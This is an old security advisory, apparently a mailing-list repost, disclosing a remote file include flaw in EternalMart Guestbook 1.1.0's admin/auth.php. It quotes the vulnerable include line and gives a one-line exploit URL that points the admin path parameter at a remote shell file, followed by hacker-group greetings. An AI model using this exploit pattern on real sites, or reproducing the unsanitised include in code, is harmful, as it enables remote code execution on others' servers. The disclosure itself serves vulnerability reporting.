Security Advisory: EternalMart Guestbook 1.1.0 [emgb_admin_path] Remote File Include

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  KISGB (Keep It Simple Guest Book)* [default_path_for_the
mes] Remote File Include
  Xt-News 0.1 : SQL Injection Vulnerability & XSS
  Multiple Remote Vulnerabilities in KISGB

From: bilkopat_(at)_hotmail.com <bilkopat_(at)_hotmail.com>
Date: 23.12.2006
Subject: EternalMart Guestbook 1.1.0 [emgb_admin_path] Remote File Include

*********************************************************************************
*********************
*EternalMart Guestbook 1.1.0********* [emgb_admin_path] ************************* Remote File Include*
*********************************************************************************
*********************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
+admin/auth.php?                                                            *
*****************************************************************************
+code :                                                                    *
+                                                                           *
+      include("$emgb_admin_path/auth_func.php");                           *
+                                                                           *
+      download link : http://www.vanta.ru/script/info.php?id=230&clas=0   *
*********************************************************************************
************
+ Exploit :                                                                                *

+********************************************************************************
************+
+ http://www.site.***/[path]/admin/auth.php?emgb_admin_path=http://mdxshell.txt? +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++
=================================================================================
=============
?              Hi , The_bat_hacker , How are you ? ;=)                                       *
?
          *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?
          *
?////////////////////////////////////////////////////////////////////////////////
/////////////
?---------------------specials thanks stroke ,SHiKaA----------------------------------------*
*********************************************************************************
*************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.
*******************                                                                          *
**************************

test server